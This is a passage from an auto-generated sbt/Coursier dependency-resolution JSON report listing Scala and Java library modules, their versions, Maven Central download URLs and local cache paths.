n\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"command_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"command_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.ben-manes.caffeine\",\"name\":\"caffeine\",\"revision\":\"2.5.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"caffeine\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/ben-manes/caffeine\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"task-system_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"task-system_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main-settings_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main-settings_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-core_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.google.protobuf\",\"name\":\"protobuf-java\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protobuf-java\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"gigahorse-okhttp_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"gigahorse-okhttp_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/gigahorse\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-scalajson_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-relation_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-relation_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-xml_2.12\",\"revision\":\"1.2.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-xml_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.spire-math\",\"name\":\"jawn-parser_2.12\",\"revision\":\"0.10.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jawn-parser_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://github.com/non/jawn\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-artifact\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-artifact\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classpath_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classpath_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-compiler\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-compiler\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"net.java.dev.jna\",\"name\":\"jna\",\"revision\":\"4.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jna\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/java-native-access/jna\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse-utils_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse-utils_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lmax\",\"name\":\"disruptor\",\"revision\":\"3.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"disruptor\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://lmax-exchange.github.com/disruptor\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"tasks_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"tasks_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.reactivestreams\",\"name\":\"reactive-streams\",\"revision\":\"1.0.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"reactive-streams\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.reactive-streams.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.slf4j\",\"name\":\"slf4j-api\",\"revision\":\"1.7.26\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"slf4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.slf4j.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.swoval\",\"name\":\"file-tree-views\",\"revision\":\"2.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"file-tree-views\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/swoval/swoval\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp\",\"revision\":\"3.14.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraA